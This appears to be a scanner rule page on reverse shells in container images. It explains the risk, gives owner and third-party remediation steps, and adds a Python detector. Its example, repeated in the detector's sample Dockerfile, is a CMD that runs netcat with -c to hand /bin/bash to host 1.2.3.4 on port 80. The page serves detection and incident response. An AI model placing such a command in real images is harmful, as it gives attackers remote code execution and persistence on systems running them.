Reverse Shell in Container Image

ID

reverse_shell

Severity

critical

Family

Malicious Image

Tags

dockerfile, malware, reachable, security, supply-chain

Description

A reverse shell was found in the container image, either in the source code or in the CMD or ENTRYPOINT scripts.

Reverse shells are a common technique to bypass firewalls and NAT devices, since the connection is initiated from inside the network, and they give the attacker remote code execution on the system running the image. The connection could be used to gain persistence, to move laterally to other systems reachable from the malicious image, to install additional malware, or to exfiltrate sensitive data such as credentials accessible from the image.

Security

A reverse shell is, under normal circumstances, a clear sign of malicious behavior in the image.

If the image is owned by the organization, an investigation is recommended to determine who altered the Dockerfile or deployed the image, and how the malicious code was introduced. Your organization may be the target of a software supply chain attack!

Examples

# This command opens at startup a reverse shell
# in any container running this image
CMD [ "nc", "-c", "/bin/bash", "1.2.3.4", "80" ]
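A minimal detection check for the pattern shown above, written here as an added example and not part of the original rule or its scanner: it parses CMD and ENTRYPOINT instructions in both exec (JSON array) and shell form and flags a netcat invocation that hands a shell to a remote peer via -c or -e. The Dockerfile content is constructed for the example; the image name and package are assumptions.

```python
import json
import shlex

# Constructed sample Dockerfile, embedding the malicious CMD from the example above.
SAMPLE_DOCKERFILE = """\
FROM debian:bookworm-slim
RUN apt-get update && apt-get install -y netcat-openbsd
# This command opens at startup a reverse shell
CMD [ "nc", "-c", "/bin/bash", "1.2.3.4", "80" ]
"""

NETCAT_NAMES = {"nc", "ncat", "netcat"}
SHELL_NAMES = {"sh", "bash"}


def instruction_args(line):
    """Return the argv of a CMD/ENTRYPOINT line, or None for any other line."""
    keyword, _, rest = line.strip().partition(" ")
    if keyword.upper() not in ("CMD", "ENTRYPOINT"):
        return None
    rest = rest.strip()
    if rest.startswith("["):
        return [str(a) for a in json.loads(rest)]  # exec form: JSON array
    return shlex.split(rest)  # shell form: parsed like a shell would


def is_netcat_reverse_shell(argv):
    """True if argv runs netcat with -c/-e executing a shell (the page's pattern)."""
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return False
    for flag, value in zip(argv, argv[1:]):
        if flag in ("-c", "-e") and value.rsplit("/", 1)[-1] in SHELL_NAMES:
            return True
    return False


def scan_dockerfile(text):
    """Return (line_number, instruction) for each CMD/ENTRYPOINT that matches."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        try:
            argv = instruction_args(line)
        except ValueError:
            continue  # malformed JSON or unbalanced quotes: skip, do not crash the scan
        if argv and is_netcat_reverse_shell(argv):
            findings.append((number, line.strip()))
    return findings


if __name__ == "__main__":
    for number, instruction in scan_dockerfile(SAMPLE_DOCKERFILE):
        print(f"line {number}: reverse shell indicator: {instruction}")
```

A real scanner would also resolve ENTRYPOINT scripts copied into the image and inspect their contents, since the rule covers those as well.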

Mitigation / Fix

When your organization owns the image:

  1. Immediate Actions:

    • Stop and remove all running containers using this image.

    • Immediately remove/quarantine the image from your registry.

    • Alert relevant teams (Security, DevOps, Development).

    • Document initial findings and preserve evidence.

  2. Investigation:

    • Check image scanning logs and vulnerability reports

    • Review build pipeline logs and source code

    • Identify how and when the malicious code was introduced

    • Determine if other images/systems were compromised

    • Analyze any suspicious network activity from affected containers

    • Notify stakeholders, including regulatory authorities and law enforcement where required, if the image was compromised through a security breach.

  3. Remediation:

    • Clean or rebuild the image from verified source code

    • Review and strengthen CI/CD pipeline security

    • Update access controls and signing requirements

    • Implement additional security scanning if needed

    • Check backup images for contamination

    • Pin image references to their immutable digest (SHA256) instead of mutable tags.

If this is a third-party image:

  1. Immediate Actions:

    • Stop and remove all containers running the malicious image

    • Block the image in your container security policies

    • Document the incident and preserve evidence

    • Notify your security team

  2. External Communication:

    • Report the malicious image to the registry provider (Docker Hub, GitHub, etc.)

    • Alert the image maintainer/owner if possible

    • Consider notifying relevant security organizations (CERT, CISA, ENISA, ...)

    • Share IOCs with trusted industry partners

  3. Internal Changes:

    • Find and validate an alternative image or vendor

    • Update deployment configurations to use safe alternatives

    • Review and possibly enhance container security policies

    • Strengthen third-party image verification processes

    • Consider maintaining local copies of verified third-party images

    • Pin image references to their immutable digest (SHA256) instead of mutable tags.